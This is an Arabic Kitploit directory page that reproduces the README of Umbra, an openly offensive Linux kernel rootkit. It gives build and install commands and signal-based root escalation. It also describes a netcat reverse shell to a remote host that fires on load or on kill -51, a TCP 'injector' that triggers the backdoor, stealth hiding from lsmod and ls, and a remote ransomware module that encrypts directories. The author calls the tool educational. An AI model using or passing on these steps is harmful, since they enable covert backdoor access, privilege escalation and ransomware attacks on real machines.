Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
Umbra — أداة LKM rootkit تستهدف إصدارات النواة 4.x و5.x، تفتح بابًا خلفيًا (backdoor) يمكنه إطلاق قشرة عكسية (reverse shell) إلى مضيف بعيد، وتشغيل برمجيات خبيثة (malware) والمزيد. | Kitploit
أدوات/GitHubGitHub/h3xduck/umbra
تصعيد الامتيازاتأدوات التشفير/فك التشفيرآليات الاستمراريةالتهرب من IDS/IPSما بعد الاستغلالالقيادة والسيطرةالتعلم والتعليمتطوير الحمولاتحصان طروادة للوصول عن بعد
GitHubh3xduck/umbra

Umbra

أداة LKM rootkit تستهدف إصدارات النواة 4.x و5.x، تفتح بابًا خلفيًا (backdoor) يمكنه إطلاق قشرة عكسية (reverse shell) إلى مضيف بعيد، وتشغيل برمجيات خبيثة (malware) والمزيد.

136275منذ 4 سنواتتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
عرض المستودع

GitHub release (latest by date including pre-releases) Maintainability GitHub code size in bytes GitHub last commit

Umbra

Umbra هو روتكيت LKM تجريبي قابل للتحكم عن بُعد لأنوية 4.x و5.x (حتى 5.7)، يفتح بابًا خلفيًا شبكيًا يمكنه تشغيل قواقع عكسية إلى مضيفين بعيدين، وإطلاق برمجيات خبيثة عن بُعد، والمزيد.

لا يزال الروتكيت قيد التطوير، على الرغم من أن الميزات المذكورة أدناه تعمل بالفعل بشكل كامل.

الباب الخلفي أثناء العمل

ملاحظة: تم تطوير هذا الروتكيت واختباره باستخدام النواة 5.4.0 وUbuntu 18.04.

الميزات

  • 🌟 باب خلفي يشغّل قوقعة عكسية إلى عنوان IP بعيد بعد استلام حزمة TCP خبيثة.
  • 🌟 استخدم Umbra Injector للتحكم في الروتكيت عن بُعد:
    • قوقعة عكسية عن بُعد.
    • إخفاء/إظهار الروتكيت عن بُعد.
    • تشغيل Umbra Modules.
  • جديد: تمت إضافة Umbra Modules، وهي وحدات خاصة تشبه البرمجيات الخبيثة تعزز Umbra ويمكن تشغيلها عن بُعد عبر Umbra Injector.
  • جديد: وحدة Umbra "Ransom" التي تحوّل Umbra إلى برنامج فدية قابل للتحكم عن بُعد.

وحدة Ransom أثناء العمل

  • يخفي Umbra جميع ملفاته وأدلته عن أوامر المستخدم مثل ls.
  • يمكن لـ Umbra إخفاء/إظهار نفسه عن بُعد ومحليًا عبر الإشارات.
  • تصعيد الامتيازات عن طريق إرسال الإشارة 50.
  • تشغيل قوقعة netcat عكسية عند تحميل الوحدة.
  • تشغيل قوقعة netcat عكسية إلى مضيف بعيد عن طريق إرسال الإشارة 51.

المزيد من الوظائف ستأتي في تحديثات لاحقة.

إخلاء مسؤولية

هذا الروتكيت لأغراض تعليمية بحتة. لست مسؤولًا عن أي ضرر ناتج عن استخدامه غير المقصود.

ضع في اعتبارك أيضًا أن Umbra يضم فقط آليات إخفاء وحماية خفيفة. ليس الغرض منه استخدامه في سيناريو حقيقي.

مهم: إذا كنت ستختبر هذا الروتكيت على جهازك الخاص، فإنني أوصي بشدة باستخدام جهاز افتراضي (VM).

حول وحدات Umbra: تستخدم وحدة ransom آلية تشفير بسيطة، لكنها تستطيع وبالتأكيد ستقوم بتشفير أي مجلد على جهازك. على الرغم من إمكانية فك تشفير الملفات بسهولة، إلا أنني بالتأكيد لا أنصح بتشغيلها على مجلد الجذر أو ما شابه إلا في بيئة خاضعة للتحكم.

جدول المحتويات

  1. البناء والتثبيت
  2. تفريغ Umbra
  3. التحكم المحلي
  4. Umbra Injector: التحكم عن بُعد
  5. وحدات Umbra
    • (جديد) Ransom
  6. المراجع

البناء والتثبيت

تذكر أنه يجب أن يتوفر لديك نواة 4.x أو 5.x.

  1. نزّل ملفات رأس النواة الخاصة بك
root@kitploit:~
apt install linux-headers-$(uname -r)
  1. هيئ مسار التضمين لديك ليشمل دليل رأس النواة (عادة تحت /usr/src). إذا كنت تستخدم vscode، يمكنك الاطلاع على .vscode/c_cpp_properties.json كمثال على الدلائل التي يجب تضمينها.

  2. استنسخ المشروع

root@kitploit:~
git clone https://github.com/h3xduck/Umbra.git
cd Umbra
  1. ابنِ Umbra
root@kitploit:~
make
  1. حمّل Umbra في النواة وهيئ البيئة سيُثبّت السكربت Umbra في النواة ويُهيئ دليلًا خاصًا لتخزين وحدات البرمجيات الخبيثة. سيتم لاحقًا إخفاء هذا الدليل بواسطة الروتكيت.
root@kitploit:~
sudo ./install.sh

إذا كنت قد شغّلت السكربت مسبقًا وترغب فقط في تثبيت Umbra في النواة، يمكنك تشغيل:

root@kitploit:~
sudo insmod ./umbra.ko

تفريغ Umbra

تأكد من أن Umbra ليس في الوضع الخفي، وإلا سيفشل هذا.

root@kitploit:~
sudo rmmod umbra

الاستخدام الأساسي: التحكم المحلي

تغيير صلاحيات المستخدم الحالي إلى root

  • أرسل الإشارة 50 إلى أي PID.
root@kitploit:~
kill -50 1

تشغيل قوقعة netcat عكسية إلى IP:PORT

  • عيِّن عنوان IP والمنفذ المطلوبين في CONFIG.H قبل بناء الروتكيت. بشكل افتراضي 127.0.0.1:5888

  • ابدأ بالاستماع على المضيف البعيد.

root@kitploit:~
nc -lvp 5888
  • أرسل الإشارة 51 إلى أي PID. سيلتقطها Umbra ويبدأ القوقعة.
root@kitploit:~
kill -51 1

ملاحظة: يحاول Umbra أيضًا تشغيل القوقعة العكسية عند التحميل.

إخفاء الروتكيت - الوضع الخفي

سيمنع هذا ظهور الروتكيت بواسطة أوامر مثل lsmod، أو إزالته عبر rmmod.

root@kitploit:~
kill -52 1

إظهار الروتكيت

يعيد هذا الحالة من الوضع الخفي إذا كان مفعلًا.

root@kitploit:~
kill -53 1

Umbra Injector: التحكم عن بُعد

الحصول على قوقعة عكسية عبر الباب الخلفي

يمكن تشغيل Umbra Injector إما قبل تثبيت Umbra (وبالتالي الحصول على القوقعة بمجرد تثبيته)، أو بعد تثبيت Umbra على النظام المستهدف.

root@kitploit:~
./injector -S 127.0.0.1

يستمع الباب الخلفي للحزم التي تحمل الحمولة التالية: UMBRA_PAYLOAD_GET_REVERSE_SHELL.

يمكنك أيضًا بناء أداة الحقن الخاصة بك باستخدام مكتبتي RawTCP.

إخفاء الروتكيت عن بُعد - الوضع الخفي

سيمنع هذا ظهور الروتكيت بواسطة أوامر مثل lsmod، أو إزالته عبر rmmod.

root@kitploit:~
./injector -i 127.0.0.1

إظهار الروتكيت عن بُعد

يعيد هذا الحالة من الوضع الخفي إذا كان مفعلًا.

root@kitploit:~
./injector -u 127.0.0.1

المساعدة

يمكنك الاطلاع على المعلومات الكاملة حول كيفية تشغيل Umbra Injector عن طريق:

root@kitploit:~
./injector -h

وحدات Umbra

سيتم تخزين وحدات Umbra بواسطة سكربت install.sh في /tmp/umbra، حيث سيخفيها Umbra. لن يكون الدليل مرئيًا بواسطة أوامر مثل ls أو ما شابه.

وحدة Ransom

يمكن لهذه الوحدة تشغيل هجمات شبيهة ببرامج الفدية عن بُعد عبر Umbra Injector. تظهر الملفات المشفرة بالامتداد .ubr.

حاليًا آلية التشفير هي NOP بسيط على مستوى البتات، كإثبات للمفهوم. يمكنك تعديل الوحدة لتضمين خوارزمية التشفير الخاصة بك.

تشفير دليل وجميع أدلته الفرعية

root@kitploit:~
./injector -p /Your/Path/To/Encrypt -e 127.0.0.1

فك تشفير دليل وجميع أدلته الفرعية

root@kitploit:~
./injector -p /Your/Path/To/Decrypt -d 127.0.0.1

المراجع

تطوير هذا الروتكيت تطلب قدرًا كبيرًا من البحث حول وحدات LKM وتقنيات الروتكيت. فيما يلي قائمة غير مكتملة بالموارد التي استخدمتها: كيفية إنشاء LKMs:

  • https://sysprog21.github.io/lkmpg/

مرجع استدعاءات نظام لينكس:

  • https://syscalls64.paolostivanin.com/

بعض مراجع الروتكيت:

  • https://xcellerator.github.io/posts/
  • https://web.archive.org/web/20160620231623/http://big-daddy.fr/repository/Documentation/Hacking/Security/Malware/Rootkits/writing-rootkit.txt
  • https://github.com/f0rb1dd3n/Reptile

الترخيص

هذا المشروع مرخّص بموجب رخصة GPLv2. انظر LICENSE

تنزيل الأداة